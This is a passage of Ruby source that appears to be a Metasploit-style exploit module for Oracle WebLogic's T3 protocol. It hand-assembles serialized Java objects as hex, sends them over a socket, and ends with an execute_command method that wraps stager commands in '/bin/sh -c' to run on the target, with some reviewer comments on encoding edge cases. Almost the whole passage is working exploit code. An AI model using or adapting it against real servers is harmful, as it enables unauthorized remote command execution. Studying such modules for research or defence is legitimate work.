    request_obj << '5b0008' # Field type: Array, field name length: 8
    request_obj << '7061636b61676573' # packages
    request_obj << '740027' # String, length: 39
    request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;
    request_obj << '2f636f6d6d6f6e2f696e'
    request_obj << '7465726e616c2f506163'
    request_obj << '6b616765496e666f3b'
    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
    request_obj << '0024' # Class name length: 36
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo
    request_obj << '6f6d6d6f6e2e696e7465'
    request_obj << '726e616c2e5665727369'
    request_obj << '6f6e496e666f'
    request_obj << '972245516452463e' # SerialVersionUID
    request_obj << '020003' # Serializable, 3 fields
    request_obj << '5b0008' # Field type: Array, field name length: 8
    request_obj << '7061636b61676573' # packages
    request_obj << '71007e0003' # TC_REFERENCE, handle
    request_obj << '4c000e' # Field type: Object, field name length: 14
    request_obj << '72656c65617365566572' # releaseVersion
    request_obj << '73696f6e'
    request_obj << '740012' # String, length: 18
    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
    request_obj << '2f537472696e673b'
    request_obj << '5b0012' # Field type: Array, field name length: 18
    request_obj << '76657273696f6e496e66' # versionInfoAsBytes
    request_obj << '6f41734279746573'
    request_obj << '740002' # String, length: 2
    request_obj << '5b42' # [B
    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
    request_obj << '0024' # Class name length: 36
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
    request_obj << '6f6d6d6f6e2e696e7465'
    request_obj << '726e616c2e5061636b61'
    request_obj << '6765496e666f'
    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
    request_obj << '020009' # Serializable, 9 fields
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d616a6f72' # major
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d696e6f72' # minor
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '70617463685570646174' # patchUpdate
    request_obj << '65'
    request_obj << '49000c' # Field type: Int, field name length: 12
    request_obj << '726f6c6c696e67506174' # rollingPatch
    request_obj << '6368'
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '73657276696365506163' # servicePack
    request_obj << '6b'
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
    request_obj << '74656d706f7261727950' # temporaryPatch
    request_obj << '61746368'
    request_obj << '4c0009' # Field type: Object, field name length: 9
    request_obj << '696d706c5469746c65' # implTitle
    request_obj << '71007e0005' # TC_REFERENCE, handle
    request_obj << '4c000a' # Field type: Object, field name length: 10
    request_obj << '696d706c56656e646f72' # implVendor
    request_obj << '71007e0005' # TC_REFERENCE, handle
    request_obj << '4c000b' # Field type: Object, field name length: 11
    request_obj << '696d706c56657273696f' # implVersion
    request_obj << '6e'
    request_obj << '71007e0005' # TC_REFERENCE, handle
    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
    request_obj << 'fe00ff' # separator
    request_obj << 'fe010000'
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    request_obj << '0013' # Class name length: 19
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
    request_obj << '6a766d2e4a564d4944'
    request_obj << 'dc49c23ede121e2a' # SerialVersionUID
    request_obj << '0c0000'
    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
    request_obj << '4621'
    request_obj << '000000000000000000'
    request_obj << '09' # length: 9
    request_obj << '3132372e302e312e31' # 127.0.1.1
    request_obj << '000b' # length: 11
    request_obj << '75732d6c2d627265656e' # us-l-breens
    request_obj << '73'
    request_obj << 'a53caff10000000700'
    request_obj << '001b59'
    request_obj << 'ffffffffffffffffffff'
    request_obj << 'ffffffffffffffffffff'
    request_obj << 'ffffffff'
    request_obj << '0078'
    request_obj << 'fe010000' # separator
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    request_obj << '0013' # Class name length: 19
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
    request_obj << '6a766d2e4a564d4944'
    request_obj << 'dc49c23ede121e2a' # SerialVersionUID
    request_obj << '0c0000'
    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
    request_obj << '1d0181401281'
    request_obj << '34bf427600093132372e'
    request_obj << '302e312e31a53caff1'
    request_obj << '000000000078'

    # Hex string -> byte count is length / 2; overwrite the placeholder
    # '000009f3' length field (first 8 hex chars) with the real value.
    new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')
    request_obj[0, 8] = new_len
    sock.put([request_obj].pack('H*'))
    sleep(1)
  end

  # Encodes payload_cmd as the three TC_STRING entries of the String[] that
  # build_payload_obj declares with length 3: split on the first two spaces
  # only, so the third part keeps its internal spaces (e.g. the argument to
  # '/bin/sh -c ' prepended in execute_command).  Each entry is 0x74, a 2-byte
  # length, then the bytes.
  #
  # NOTE(review): the length uses String#length (characters) while the body is
  # emitted per byte; they agree only for ASCII input.  A part longer than
  # 0xffff would also produce more than 4 hex digits since rjust does not
  # truncate.  Fewer than three parts yields fewer than the declared 3 entries.
  def format_payload(payload_cmd)
    print_status('Formatting payload...')
    payload_arr = payload_cmd.split(' ', 3)
    formatted_payload = ''
    payload_arr.each do |part|
      formatted_payload << '74' # denotes a string
      formatted_payload << part.length.to_s(16).rjust(4, '0')
      formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join
    end
    formatted_payload
  end

  # CmdStager callback for the Unix target: each stager chunk is run through
  # '/bin/sh -c'.  Note `cmd.prepend` mutates the caller's string in place.
  def execute_command(cmd, _opts = {})
    cmd.prepend('/bin/sh -c ')
    cmd = build_payload_obj(cmd)
    t3_send(cmd)
  end
end